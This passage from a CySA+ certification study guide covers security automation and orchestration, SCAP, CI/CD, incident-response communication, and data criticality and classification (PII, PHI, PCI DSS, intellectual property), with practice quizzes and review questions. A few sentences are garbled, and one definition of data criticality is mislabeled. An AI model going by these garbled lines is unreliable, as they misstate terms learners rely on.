IMPROVING DETECTION
CAPABILITIES
Detection of events and incidents as they occur is critical.
Organizations should be constantly trying to improve
their detection capabilities.
Continuous Improvement
Security professionals can never just sit back, relax, and
enjoy the ride. Security needs are always changing
because the “bad guys” never take a day off. It is
therefore vital that security professionals continuously
work to improve their organization’s security. Tied into
this is the need to improve the quality of the security
controls currently implemented. Quality improvement
commonly uses a four-step quality model, known as
Deming’s Plan–D–Check–Act cycle, the steps for which
are as follows:
1. Plan: Identify an area for improvement and make a
formal plan to implement it.
2. Do: Implement the plan on a small scale.
3. Check: Analyze the results of the implementation
to determine whether it made a difference.
4. Act: If the implementation made a positive change,
implement it on a wider scale. Continuously
analyze the results.
This can’t be done without establishing some metrics to
determine how successful you are now.
Continuous Monitoring
Any logging and monitoring activities should be part of
an organizational continuous monitoring program. The
continuous monitoring program must be designed to
meet the needs of the organization and implemented
correctly to ensure that the organization’s critical
infrastructure is guarded. Organizations may want to
look into Continuous Monitoring as a Service (CMaaS)
solutions deployed by cloud service providers.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 13-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 13-2 Key Topics in Chapter 13
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
threat actors
hacker
cracker
hunt teaming
threat model
executable process analysis
Process Explorer
system hardening
configuration lockdown
sensitivity
criticality
attack vector
integrated intelligence
REVIEW QUESTIONS
1. Place the following steps of the scientific method in
order.
2. List and describe at least one threat modeling tool.
3. ____________________ allows you to
determine when a CPU is struggling with malware.
4. Match the following terms with their definitions.
5. List the military/government data classification
levels in order.
6. A(n) _____________________ is a segment of
the communication path that an attack uses to
access a vulnerability.
7. Match the following terms with their definitions.
8. List at least two hardening techniques.
9. Data should be classified based on its
_____________ to the organization and its
____________ to disclosure.
10. Match the following terms with their definitions.
Chapter 14. Automation
Concepts and
Technologies
This chapter covers the following topics related
to Objective 3.4 (Compare and contrast
automation concepts and technologies) of the
CompTIA Cybersecurity Analyst (CySA+) CS0002 certification exam:
• Workflow orchestration: Describes the
process of Security Orchestration, Automation,
and Response (SOAR) and its role in security
• Scripting: Reviews the scripting process and its
role in automation
• Application programming interface (API)
integration: Describes how this process reduces
access to an application’s internal functions
through an API
• Automated malware signature creation:
Identifies an automated process of malware
identification
• Data enrichment: Discusses processes used to
enhance, refine, or otherwise improve raw data
• Threat feed combination: Defines a process
for making use of data from multiple intelligence
feeds
• Machine learning: Describes the role machine
learning plays in automated security
• Use of automation protocols and
standards: Identifies various protocols and
standards, including Security Content Automation
Protocol (SCAP), and their application
• Continuous integration: Covers the process of
ongoing integration of software components
during development
• Continuous deployment/delivery: Covers the
process of ongoing review and upgrade of
software
Traditionally, network operations and threat intelligence
activities were performed manually by technicians.
Increasingly in today’s environments, these processes are
being automated through the use of scripting and other
automation tools. This chapter explores how workflows
can be automated.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these ten self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 14-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 14-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following enables you to automate the
response to a security issue? (Choose the best
answer.)
a. Orchestration
b. Piping
c. Scripting
d. Virtualization
2. Which scripting language is used to work in the
Linux interface?
a. Python
b. Bash
c. Ruby
d. Perl
3. Which of the following is used to provide
integration between your website and a payment
gateway?
a. Perl
b. Orchestration
c. API
d. Scripting
4. Which of the following is an additional method of
identifying malware?
a. DHCP snooping
b. DAI
c. Automated malware signature creation
d. Piping
5. When you receive bulk e-mail from a vendor and it
refers to you by first name, what technique is in
use?
a. Scripting
b. Orchestration
c. Heuristics
d. Data enrichment
6. Threat feeds inform the recipient about all but
which of the following?
a. Presence of malware on the recipient
b. Suspicious domains
c. Lists of known malware hashes
d. IP addresses associated with malicious activity
7. Which of the following is an example of machine
learning?
a. NAC
b. AEG
c. EDR
d. DLP
8. Which of the following is a standard that the
security automation community uses to enumerate
software flaws and configuration issues?
a. NAC
b. DAC
c. SCAP
d. DLP
9. Which of the following is a software development
practice whereby the work of multiple individuals
is combined a number of times a day?
a. Sinkholing
b. Continuous integration
c. Aggregation
d. Inference
10. Which of the following is considered the next
generation of DevOps and attempts to make sure
that software developers can release new product
changes to customers quickly in a sustainable way?
a. Agile
b. DevSecOps
c. Continuous deployment/delivery
d. Scrum
FOUNDATION TOPICS
WORKFLOW
ORCHESTRATION
Workflow orchestration is the sequencing of events
based on certain parameters by using scripting and
scripting tools. Over time orchestration has been
increasingly used to automate processes that were
formerly carried out manually by humans.
In virtualization, it is quite common to use orchestration.
For example, in the VMware world, technicians can
create what are called apps, groups of virtual machines
that are managed and orchestrated as a unit to provide a
service to users. Using orchestration tools, you can set
one device to always boot before another device. For
example, in an Windows Active Directory environment,
you may need the domain controller (DC) to boot up
before the database server so that the database server
can property authenticate to the DC and function
correctly.
Figure 14-1 shows another, more complex automated
workflow orchestration using VMware vCloud
Automation Center (vCAC).
Figure 14-1 Workflow Orchestration
The workflow is sequenced to occur in the following
fashion:
1. A request comes in to write to the disk.
2. The disk space is checked.
3. Insufficient space is found.
4. A change request is generated for more space.
5. A disk is added.
6. The configuration database is updated.
7. The user is notified.
While this is one use of workflow orchestration, it can
also be used in the security world. Examples include
• Dynamic incident response plans that adapt in
real time
• Automated workflows to empower analysts and
enable faster response
SCRIPTING
Scripting languages and scripting tools are used to
automate a process. Common scripting languages
include
• bash: Used to work in the Linux interface
• Node js: Framework to write network
applications using JavaScript
• Ruby: Great for web development
• Python: Supports procedure-oriented
programming and object-oriented programming
• Perl: Found on all Linux servers, helps in text
manipulation tasks
• Windows PowerShell: Found on all Windows
servers
Scripting tools that require less knowledge of the actual
syntax of the language can also be used, such as
• Puppet
• Chef
• Ansible
For example, Figure 14-2 shows Puppet being used to
automate the update of Apache servers.
Figure 14-2 Puppet Orchestration
APPLICATION
PROGRAMMING INTERFACE
(API) INTEGRATION
As a review, an API is a set of clearly defined methods of
communication between various software components.
As such, you should think of an API as a connection
point that requires security consideration. For example,
an API between your e-commerce site and a payment
gateway must be secure. So, what is API integration and
why is it important?
API integration means that the applications on either
end of the API are synchronized and protecting the
integrity of the information that passes across the API. It
also enables the proper updating and versioning required
in many environments. The term also describes the
relationship between a website and an API when the API
is integrated into the website.
AUTOMATED MALWARE
SIGNATURE CREATION
Automated malware signature creation is an
additional method of identifying It might not be
malware. The antivirus software monitors incoming
unknown files for the presence of malware and analyzes
each file based on both classifiers of file behavior and
classifiers of file content. The file is then classified as
having a particular malware classification. Subsequently,
a malware signature is generated for the incoming
unknown file based on the particular malware
classification. This malware signature can be used by an
antivirus program as a part of the antivirus program’s
virus identification processes.
DATA ENRICHMENT
Data enrichment is a technique that allows one
process to gather information from another process or
source and then customize a response to a third source
using the data from the second process or source. When
you receive bulk e-mail from a vendor and it refers to you
by first name, that is an example of data enrichment in
use. In that case a file of email address is consult (second
process) and added to the response to you. Another
common data enrichment process would, for example,
correct likely misspellings or typographical errors in a
database by using precision algorithms designed for that
purpose. Another way in which data enrichment can
work is by extrapolating data.
This can create a privacy issue that has been raised by
the EU General Data Protection Regulation (GDPR),
leading to some privacy regulations by the EU that limit
data enrichment for this very reason. Users typically
have a reasonable idea about which information they
have provided to a specific organization, but if the
organization adds information from other databases, this
picture will be skewed. The organization will have
information about them of which they are not aware.
Figure 14-3 shows another security-related example of
the data enrichment process. This is an example of an
automated process used by a security analytics platform
called Blue Coat. The data enrichment part of the process
occurs at Steps 4 and 5 when information from an
external source is analyzed and used to enrich the alert
message that is generated from the file detected.
Figure 14-3 Data Enrichment Process Example
THREAT FEED
COMBINATION
A threat feed is a constantly updating stream of
intelligence about threat indicators and artifacts that is
delivered by a third-party security organization. Threat
feeds are used to inform the organization as quickly as
possible about new threats that have been identified.
Threat feeds contain information including
• Suspicious domains
• Lists of known malware hashes
• IP addresses associated with malicious activity
Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities,” described how a SIEM aggregates
the logs from various security devices into a single log for
analysis. By analyzing the single aggregated log,
inferences can be made about potential issues or attacks
that would not be possible if the logs were analyzed
separately.
Using SIEM (or other aggregation tools) to aggregate
threat feeds can also be beneficial, and tools and services
such as the following offer this type of threat feed
combination:
• Combine: Gathers threat intelligence feeds from
publicly available sources
• Palo Alto Networks AutoFocus: Provides
intelligence, correlation, added context, and
automated prevention workflows
• Anomali ThreatStream: Helps deduplicate
data, removes false positives, and feeds
intelligence to security tools
• ThreatQuotient: Helps accelerate security
operations with an integrated threat library and
shared contextual intelligence
• ThreatConnect: Combines external threat data
from trusted sources with in-house data
MACHINE LEARNING
Artificial intelligence (AI) and machine learning have
fascinated humans for decades. Artificial intelligence
(AI) is the capability of a computer system to make
decisions using human-like intelligence. Machine
learning is a way to make that possible by creating
algorithms that enable the system to learn from what it
sets and apply it. Since the first time we conceived of the
idea of talking to a computer and getting an answer like
characters did in comic books years ago, we have waited
for the day to come when smart robots would not just do
the dirty work but also learn just as humans do.
Today, robots are taking on increasingly more and more
detailed work. One of the exciting areas where AI and
machine learning is yielding dividends is in intelligent
network security—or the intelligent network. These
networks seek out their own vulnerabilities before
attackers do, learn from past errors, and work on a
predictive model to prevent attacks.
For example, automatic exploit generation (AEG) is the
“first end-to-end system for fully automatic exploit
generation,” according to the Carnegie Mellon Institute’s
own description of its AI named Mayhem. Developed for
off-the-shelf as well as the enterprise software being
increasingly used in smart devices and appliances, AEG
can find a bug and determine whether it is exploitable.
USE OF AUTOMATION
PROTOCOLS AND
STANDARDS
As in almost every other area of IT, standards and
protocols for automation have emerged to help support
the development and sharing of threat information. As
with all standards, the goal is to arrive at common
methods of sharing threat data.
Security Content Automation
Protocol (SCAP)
Chapter 2, “Utilizing Threat Intelligence to Support
Organizational Security,” introduced the Common
Vulnerability Scoring System (CVSS), a common system
for describing the characteristics of a threat in a standard
format. The ranking of vulnerabilities that are discovered
is based on predefined metrics that also are used by the
Security Content Automation Protocol (SCAP).
This is a standard that the security automation
community uses to enumerate software flaws and
configuration issues. It standardized the nomenclature
and formats used. A vendor of security automation
products can obtain a validation against SCAP,
demonstrating that it will interoperate with other
scanners and express the scan results in a standardized
way.
Understanding the operation of SCAP requires an
understanding of its identification schemes, one of which
you learned about, CVE. Let’s review it.
• Common Configuration Enumeration
(CCE): These are configuration best practice
statements maintained by the National Institute
of Standards and Technology (NIST).
• Common Platform Enumeration (CPE):
These are methods for describing and classifying
operating systems, applications, and hardware
devices.
• Common Weakness Enumeration (CWE):
These are design flaws in the development of
software that can lead to vulnerabilities.
• Common Vulnerabilities and Exposures
(CVE): These are vulnerabilities in published
operating systems and applications software.
A good example of the implementation of this is the
Window System Center Configuration Manager
Extensions for SCAP. It allows for the conversion of
SCAP data files to Desired Configuration Management
(DCM) Configuration Packs and converts DCM reports
into SCAP format.
CONTINUOUS INTEGRATION
Continuous integration is a software development
practice whereby the work of multiple individuals is
combined a number of times a day. The idea behind this
is to identity bugs as early as possible in the development
process. As it relates to security, the goal of continuous
integration is to locate security issues as soon as possible.
Continuous integration security testing improves code
integrity, leads to more secure software systems, and
reduces the time it takes to release new updates. Usually,
merging all development versions of the code base occurs
multiple times throughout a day. Figure 14-4 illustrates
this process.
Figure 14-4 Continuous Integration
CONTINUOUS
DEPLOYMENT/DELIVERY
Taking continuous integration one step further is the
concept of continuous deployment/delivery. It is
considered the next gen of DevOps and attempts to make
sure that software developers can release new changes to
customers quickly in a sustainable way. Continuous
deployment goes one step further with every change that
passes all stages of your production pipeline being
released to your customers. This helps to improve the
feedback loop. Figure 14-5 illustrates the relationship
between the three concepts.
Figure 14-5 Continuous Integration, Continuous
Delivery, and Continuous Deployment
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 14-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 14-2 Key Topics in Chapter 14
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
workflow orchestration
scripting
application programming interface (API) integration
bash
Node.js
Ruby
Python
Perl
automated malware signature creation
data enrichment
threat feed
machine learning
Security Content Automation Protocol (SCAP)
Common Configuration Enumeration (CCE)
Common Platform Enumeration (CPE)
Common Weakness Enumeration (CWE)
Common Vulnerabilities and Exposures (CVE)
continuous integration
continuous deployment/delivery
REVIEW QUESTIONS
1. _______________ is the sequencing of events
based on certain parameters by using scripting and
scripting tools.
2. List at least one use of workflow orchestration in
the security world.
3. Match the following terms with their definitions.
4. __________________ is a scripting tool found
in Windows servers.
5. List at least two of the components of SCAP.
6. Puppet is a ________________________ tool.
7. List at least two types of information available from
threat feeds.
8. Match the following SCAP terms with their
definitions.
9. _________________________ is a software
development practice where by the work of
multiple individuals is combined a number of times
a day
10. List at least two threat feed aggregation tools.
11. Match the following terms with their definitions.
12. ______________________ are groups of
VMware virtual machines that are managed and
orchestrated as a unit to provide a service to users.
Chapter 15. The Incident
Response Process
This chapter covers the following topics related
to Objective 4.1 (Explain the importance of the
incident response process) of the CompTIA
Cybersecurity Analyst (CySA+) CS0-002
certification exam:
• Communication plan: Describes the proper
incident response processes for communication
during an incident, which includes limiting
communications to trusted parties, disclosing
based on regulatory/legislative requirements,
preventing inadvertent release of information,
using a secure method of communication, and
reporting requirements
• Response coordination with relevant
entities: Describes the entities with which
coordination is required during an incident,
including legal, human resources, public relations,
internal and external, law enforcement, senior
leadership, and regulatory bodies
• Factors contributing to data criticality:
Identifies factors that determine the criticality of
an information resource, which include personally
identifiable information (PII), personal health
information (PHI), sensitive personal information
(SPI), high value asset, financial information,
intellectual property, and corporate information
The incident response process is a formal approach to
responding to security issues. It attempts to avoid the
haphazard approach that can waste time and resources.
This chapter and the next chapter examine this process.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these six self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks.” Table 15-1 lists the major headings
in this chapter and the “Do I Know This Already?” quiz
questions covering the material in those headings so that
you can assess your knowledge of these specific areas.
The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 15-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is false with respect to the
incident response communication plan?
a. Organizations in certain industries may be
required to comply with regulatory or legislative
requirements with regard to communicating
data breaches.
b. Content of these communications should
include as much information as possible.
c. All responders should act to prevent the
disclosure of any information to parties that are
not specified in the communication plan.
d. All communications that takes place between
the stakeholders should use a secure
communication process.
2. Which of the following HIPAA rules requires
covered entities and their business associates to
provide notification following a breach of
unsecured PHI?
a. Breach Notification Rule
b. Privacy Rule
c. Security Rule
d. Enforcement Rule
3. Which of the following is responsible for reviewing
NDAs to ensure support for incident response
efforts?
a. Human resources
b. Legal
c. Management
d. Public relations
4. Which of the following is responsible for
developing all written responses to the outside
world concerning an incident and its response?
a. Human resources
b. Legal
c. Management
d. Public relations
5. Which of the following is any piece of data that can
be used alone or with other information to identify
a single person?
a. Intellectual property
b. Trade secret
c. PII
d. PPP
6. Which of the following is not intellectual property?
a. Patent
b. Trade secret
c. Trademark
d. Contract
FOUNDATION TOPICS
COMMUNICATION PLAN
Over time, best practices have evolved for handling the
communication process between stakeholders. By
following these best practices, you have a greater chance
of maintaining control of the process and achieving the
goals of incident response. Failure to follow these
guidelines can lead to lawsuits, the premature alerting of
the suspected party, potential disclosure of sensitive
information, and, ultimately, an incident response
process that is less effective than it could be.
Limiting Communication to Trusted
Parties
During an incident, communications should take place
only with those who have been designated beforehand to
receive such communications. Moreover, the content of
these communications should be limited to what is
necessary for each stakeholder to perform his or her role.
Disclosing Based on
Regulatory/Legislative Requirements
Organizations in certain industries may be required to
comply with regulatory or legislative requirements with
regard to communicating data breaches to affected
parties and to those agencies and legislative bodies
promulgating these regulations. The organization should
include these communication types in the
communication plan.
Preventing Inadvertent Release of
Information
All responders should act to prevent the disclosure of any
information to parties that are not specified in the
communication plan. Moreover, all information released
to the public and the press should be handled by public
relations or persons trained for this type of
communication. The timing of all communications
should also be specified in the plan.
Using a Secure Method of
Communication
All communications that take place between the
stakeholders should use a secure communication process
to ensure that information is not leaked or sniffed.
Secure communication channels and strong
cryptographic mechanisms should be used for these
communications. The best approach is to create an outof-band method of communication, which does not use
the regular methods of corporate e-mail or VoIP. While
personal cell phones can be a method for voice
communication, file and data exchange should be
through a method that provides end-to-end encryption,
such as Off-the-Record (OTR) Messaging.
Reporting Requirements
Beyond the communication requirements within the
organization, there may be legal obligations to report to
agencies or governmental bodies during and following a
security incident. Especially when sensitive customer,
vendor, or employee records are exposed, organizations
are required to report this is a reasonable time frame.
For example, in the healthcare field, the HIPAA
Breach Notification Rule, 45 CFR §§ 164.400-414,
requires HIPAA covered entities and their business
associates to provide notification following a breach of
unsecured protected health information (PHI). As
another example, all 50 states, the District of Columbia,
Guam, Puerto Rico, and the Virgin Islands have enacted
legislation requiring private or governmental entities to
notify individuals of security breaches of information
involving personally identifiable information (PII). PHI
and PII are described in more detail later in this chapter.
RESPONSE COORDINATION
WITH RELEVANT ENTITIES
During an incident, proper communication among the
various stakeholders in the process is critical to the
success of the response. One key step that helps ensure
proper communication is to select the right people for
the incident response (IR) team. Because these
individuals will be responsible for communicating with
stakeholders, communication skills should be a key
selection criterion for the IR team. Moreover, this team
should take the following steps when selecting
individuals to represent each stakeholder community:
• Select representatives based on communication
skills.
• Hold regular meetings.
• Use proper escalation procedures.
The following sections identify these stakeholders,
discuss why the communication process is important,
describe best practices for the communication process,
and list the responsibilities of various key roles involved
in the response.
Legal
The role of the legal department is to do the following:
• Review nondisclosure agreements (NDAs) to
ensure support for incident response efforts.
• Develop wording of documents used to contact
possibly affected sites and organizations.
• Assess site liability for illegal computer activity.
Human Resources
The role of the HR department involves the following
responsibilities in response:
• Develop job descriptions for those persons who
will be hired for positions involved in incident
response.
• Create policies and procedures that support the
removal of employees found to be engaging in
improper or illegal activity.
For example, HR should ensure that these activities are
spelled out in policies and new hire documents as
activities that are punishable by firing. This can help
avoid employment disputes when the firing occurs.
Public Relations
The role of public relations is managing the dialog
between the organization and the outside world. One
person should be designated to do all talking to the
media so as to maintain a consistent message.
Responsibilities of the PR department include the
following:
• Handling all press conferences that may be held
• Developing all written response to the outside
world concerning the incident and its response
Internal and External
Most of the stakeholders will be internal to the
organization but not all. External stakeholders (law
enforcement, industry organizations, and media) should
be managed separately from the internal stakeholders.
Communications to external stakeholders may require a
different and more secure medium.
Law Enforcement
Law enforcement may become involved in many
incidents. Sometimes they are required to become
involved, but in many instances, the organization is likely
to invite law enforcement to get involved. When making
a decision about whether to involve law enforcement,
consider the following factors:
• Law enforcement will view the incident differently
than the company security team views it. While
your team may be more motivated to stop attacks
and their damage, law enforcement may be
inclined to let an attack proceed in order to gather
more evidence.
• The expertise of law enforcement varies. While
contacting local law enforcement may be
indicated for physical theft of computers and
similar incidents, involving law enforcement at
the federal level, where greater skill sets are
available, may be indicated for more abstract
crimes and events. The USA PATRIOT Act
enhanced the investigatory tools available to law
enforcement and expanded their ability to look at
e-mail communications, telephone records,
Internet communications, medical records, and
financial records, which can be helpful.
• Before involving law enforcement, try to rule out
other potential causes of an event, such as
accidents and hardware or software failure.
• In cases where laws have obviously been broken
(child pornography, for example), immediately get
law enforcement involved. This includes any
felonies, regardless of how small the loss to the
company may have been.
Senior Leadership
The most important factor in the success of an incident
response plan is the support, both verbal and financial
(through the budget process), of senior leadership.
Moreover, all other levels of management should fall in
line with support of all efforts. Specifically, senior
leadership’s role involves the following:
• Communicate the importance of the incident
response plan to all parts of the organization.
• Create agreements that detail the authority of the
incident response team to take over business
systems if necessary.
• Create decision systems for determining when key
systems must be removed from the network
Regulatory Bodies
Earlier in this chapter you learned that there are
reporting requirements to certain governmental bodies
when a data breach occurs. This makes these agencies
external stakeholders. Be aware of reporting
requirements based on the industry in which the
organization operates. An incident response should be
coordinated with any regulatory bodies that regulate the
industry in which the organization operates.
FACTORS CONTRIBUTING
TO DATA CRITICALITY
Sensitivity is a measure of how freely data can be
handled. Some data requires special care and handling,
especially when inappropriate handling could result in
penalties, identity theft, financial loss, invasion of
privacy, or unauthorized access by an individual or many
individuals. Some data is also subject to regulation by
state or federal laws and requires notification in the
event of a disclosure.
Data is assigned a level of sensitivity based on who
should have access to it and how much harm would be
done if it were disclosed. This assignment of sensitivity is
called data classification.
Criticality is a measure of the importance of the data.
Data considered sensitive may not necessarily be
considered critical. Assigning a level of criticality to a
particular data set must take into consideration the
answer to a few questions:
• Will you be able to recover the data in case of
disaster?
• How long will it take to recover the data?
• What is the effect of this downtime, including loss
of public standing?
Data is considered critical when it is essential to the
organization’s business. When essential data is not
available, even for a brief period of time, or its integrity is
questionable, the organization is unable to function.
Data is considered critical when it is important to the
organization but organizational operations can continue
for a predetermined period of time even if the data is not
available. Data is considered nonessential if the
organization is able to operate without it during
extended periods of time.
Once the sensitivity and criticality of data are understood
and documented, the organization should work to create
a data classification system. Most organizations use
either a commercial business classification system or a
military and government classification system.
To properly categorize data types, a security analyst
should be familiar with some of the most sensitive types
of data that the organization may possess.
When responding to an incident the criticality of the data
at risk should be a prime consideration when assigning
resources to the incident. When the data at risk is more
critical, the more resources should be assigned to the
issue, because it becomes more important that time is of
the essence to identify and correct any settings or
policies that are implicated in the incident.
Personally Identifiable Information
(PII)
When considering technology and its use today, privacy
is a major concern of users. This privacy concern usually
involves three areas: which personal information can be
shared with whom, whether messages can be exchanged
confidentially, and whether and how one can send
messages anonymously. Privacy is an integral part of any
security measures that an organization takes.
As part of the security measures that organizations must
take to protect privacy, personally identifiable
information (PII) must be understood, identified, and
protected. PII is any piece of data that can be used alone
or with other information to identify a single person. Any
PII that an organization collects must be protected in the
strongest manner possible. PII includes full name,
identification numbers (including driver’s license
number and Social Security number), date of birth, place
of birth, biometric data, financial account numbers (both
bank account and credit card numbers), and digital
identities (including social media names and tags).
Keep in mind that different countries and levels of
government can have different qualifiers for identifying
PII. Security professionals must ensure that they
understand international, national, state, and local
regulations and laws regarding PII. As the theft of this
data becomes even more prevalent, you can expect more
laws to be enacted that will affect your job. Figure 15-1
shows examples of PII.
Figure 15-1 Personally Identifiable Information
The most obvious reaction to the issue of privacy is the
measures in the far-reaching EU General Data Protection
Regulation (GDPR) The GDPR aims primarily to give
control to individuals over their personal data and to
simplify the regulatory environment for international
business by unifying the regulation within the EU.
Personal Health Information (PHI)
One particular type of PII that an organization might
possess is personal health information (PHI). PHI
includes the medical records of individuals and must be
protected in specific ways, as prescribed by the
regulations contained in the Health Insurance Portability
and Accountability Act of 1996 (HIPAA). HIPAA, also
known as the Kennedy-Kassebaum Act, affects all
healthcare facilities, health insurance companies, and
healthcare clearinghouses. It is enforced by the Office for
Civil Rights (OCR) of the Department of Health and
Human Services (HHS). It provides standards and
procedures for storing, using, and transmitting medical
information and healthcare data. HIPAA overrides state
laws unless the state laws are stricter. Additions to this
law now extend its requirements to third parties that do
work for covered organizations in which those parties
handle this information.
Note
Objective 4.1 of the CySA+ exam refers to PHI as personal health information,
whereas HIPAA refers to it as protected health information.
Sensitive Personal Information (SPI)
Some types of information should receive special
treatment, and certain standards have been designed to
protect this information. This type of data is called
sensitive personal information (SPI). The best
example of this is credit card information. Almost all
companies possess and process credit card data. Holders
of this data must protect it. Many of the highest-profile
security breaches that have occurred have involved the
theft of this data. The Payment Card Industry Data
Security Standard (PCI DSS) affects any
organizations that handle cardholder information for the
major credit card companies. The latest version at the
time of writing is 3.2.1. To prove compliance with the
standard, an organization must be reviewed annually.
Although PCI DSS is not a law, this standard has affected
the adoption of several state laws. PCI DSS specifies 12
requirements, listed in Table 15-2.
Table 15-2 Control Objectives of PCI DSS
High Value Asset
Some assets are not actually information but systems
that provide access to information. When these systems
or groups of systems provide access to data required to
continue to do business, they are called critical systems.
While it is somewhat simpler to arrive at a value for
physical assets such as servers, routers, switches, and
other devices, in cases where these systems provide
access to critical data or are required to continue a
business-critical process, their value is more than the
replacement cost of the hardware. The assigned value
should be increased to reflect its importance in providing
access to data or its role in continuing a critical process.
Financial Information
Financial and accounting data in today’s networks is
typically contained in accounting information systems
(AISs). While these systems offer valuable integration
with other systems, such as HR and customer
relationship management systems, this integration
comes at the cost of creating a secure connection
between these systems. Many organizations are also
abandoning legacy accounting software for cloud-based
vendors to maximize profit. Cloud arrangements bring
their own security issues, such as the danger of data
comingling in the multitenancy environment that is
common in public clouds. Moreover, considering that a
virtual infrastructure underlies these cloud systems, all
the dangers of the virtual environment come into play.
Considering the criticality of this data and the need of
the organization to keep the bulk of it confidential,
incidents that target this type of information or the
systems that provide access to this data should be given
high priority. The following steps should be taken to
protect this information:
• Always ensure physical security of the building.
• Ensure that a firewall is deployed at the perimeter
and make use of all its features, such as URL and
application filtering, intrusion prevention,
antivirus scanning, and remote access via virtual
private networks and TLS/SSL encryption.
• Diligently audit file and folder permissions on all
server resources.
• Encrypt all accounting data.
• Back up all accounting data and store it on servers
that use redundant technologies such as RAID.
Intellectual Property
Intellectual property is a tangible or intangible asset
to which the owner has exclusive rights. Intellectual
property law is a group of laws that recognize exclusive
rights for creations of the mind. The intellectual property
covered by this type of law includes the following:
• Patents
• Trade secrets
• Trademarks
• Copyrights
The following sections explain these types of intellectual
properties and their internal protection.
Patent
A patent is granted to an individual or a company to
protect an invention that is described in the patent’s
application. When the patent is granted, only the patent
owner can make, use, or sell the invention for a period of
time, usually 20 years. Although a patent is considered
one of the strongest intellectual property protections
available, the invention becomes public domain after the
patent expires, thereby allowing any entity to
manufacture and sell the product.
Patent litigation is common in today’s world. You
commonly see technology companies, such as Apple, HP,
and Google, filing lawsuits regarding infringement on
patents (often against each other). For this reason, many
companies involve a legal team in patent research before
developing new technologies. Being the first to be issued
a patent is crucial in today’s highly competitive market.
Any product that is produced and is currently
undergoing the patent application process is usually
identified with the Patent Pending seal, shown in Figure
15-2.
Figure 15-2 Patent Pending Seal
Trade Secret
A trade secret ensures that proprietary technical or
business information remains confidential. A trade
secret gives an organization a competitive edge. Trade
secrets include recipes, formulas, ingredient listings, and
so on that must be protected against disclosure. After a
trade secret is obtained by or disclosed to a competitor or
the general public, it is no longer considered a trade
secret. Most organizations that have trade secrets
attempt to protect them by using nondisclosure
agreements (NDAs). An NDA must be signed by any
entity that has access to information that is part of a
trade secret. Anyone who signs an NDA will suffer legal
consequences if the organization is able to prove that the
signer violated it.
Trademark
A trademark ensures that a symbol, a sound, or an
expression that identifies a product or an organization is
protected from being used by another organization. A
trademark allows a product or an organization to be
recognized by the general public. Most trademarks are
marked with one of the designations shown in Figure 153. If a trademark is not registered, an organization
should use a capital TM. If the trademark is registered,
an organization should use a capital R that is encircled.
Figure 15-3 Trademark Designations
Copyright
A copyright ensures that a work that is authored is
protected from any form of reproduction or use without
the consent of the copyright holder, usually the author or
artist who created the original work. A copyright lasts
longer than a patent.
Although the U.S. Copyright Office has several guidelines
to determine the amount of time a copyright lasts, the
general rule for works created after January 1, 1978, is
the life of the author plus 70 years. In 1996, the World
Intellectual Property Organization (WIPO) standardized
the treatment of digital copyrights. Copyright
management information (CMI) is licensing and
ownership information that is added to any digital work.
In this standardization, WIPO stipulated that CMI
included in copyrighted material cannot be altered. The
[cw] symbol denotes a work that is copyrighted.
Securing Intellectual Property
Intellectual property of an organization, including
patents, copyrights, trademarks, and trade secrets, must
be protected, or the business loses any competitive
advantage created by such properties. To ensure that an
organization retains the advantages given by its IP, it
should do the following:
• Invest in well-written NDAs to be included in
employment agreements, licenses, sales contracts,
and technology transfer agreements.
• Ensure that tight security protocols are in place for
all computer systems.
• Protect trade secrets residing in computer systems
with encryption technologies or by limiting
storage to computer systems that do not have
external Internet connections.
• Deploy effective insider threat countermeasures,
particularly focused on disgruntlement detection
and mitigation techniques.
Corporate Information
Corporate confidential data is anything that needs to be
kept confidential within the organization. This can
include the following:
• Plan announcements
• Processes and procedures that may be unique to
the organization
• Profit data and estimates
• Salaries
• Market share figures
• Customer lists
• Performance appraisal
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 15-3 lists a reference of these key topics and the
page numbers on which each is found.
Table 15-3 Key Topics
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
HIPAA Breach Notification Rule
USA PATRIOT Act
sensitivity
criticality
personally identifiable information (PII)
personal health information (PHI)
sensitive personal information (SPI)
Payment Card Industry Data Security Standard (PCI
DSS)
intellectual property
patent
trade secret
trademark
copyright
REVIEW QUESTIONS
1. After a breach, all information released to the public
and the press should be handled by
_________________.
2. List at least one job of the human resources
department with regard to incident response.
3. Match the following terms with their definitions
4. It is the role of ____________________ to
develop job descriptions for those persons who will
be hired for positions involved in incident
response.
5. List at least one of the roles of senior leadership in
incident response.
6. Match the following terms with their definitions.
7. The most important factor in the success of an
incident response plan is the support, both verbal
and financial (through the budget process), of
________________
